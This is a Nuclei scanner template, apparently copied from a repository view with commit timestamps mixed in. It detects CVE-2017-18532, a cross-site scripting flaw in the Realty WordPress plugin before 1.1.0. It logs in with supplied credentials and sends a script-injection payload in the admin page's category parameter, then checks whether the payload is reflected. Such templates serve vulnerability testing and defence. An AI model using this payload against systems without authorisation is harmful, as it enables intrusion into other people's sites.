nuclei-templates/http/cves/2017/CVE-2017-18532.yaml

46 lines
1.4 KiB
YAML
Raw Normal View History

2023-10-05 18:36:49 +00:00
id: CVE-2017-18532
info:
name: Realty by BestWebSoft < 1.1.0 - Cross-Site Scripting
author: luisfelipe146
severity: medium
description: |
The realty plugin before 1.1.0 for WordPress has multiple XSS issues.
reference:
- https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
- https://nvd.nist.gov/vuln/detail/CVE-2017-18532
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18532
- https://wordpress.org/plugins/realty/#developers
classification:
cve-id: CVE-2017-18532
metadata:
max-request: 2
verified: true
tags: cve,cve2017,wordpress,wp-plugin,xss,authenticated
2023-10-22 12:35:42 +00:00
http:
2023-10-05 18:36:49 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
2023-10-22 12:35:42 +00:00
GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/realty/readme.txt HTTP/1.1
2023-10-05 18:36:49 +00:00
Host: {{Hostname}}
cookie-reuse: true
matchers:
2023-10-22 12:35:42 +00:00
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
- 'contains(body_3, "Realty by BestWebSoft")'
condition: and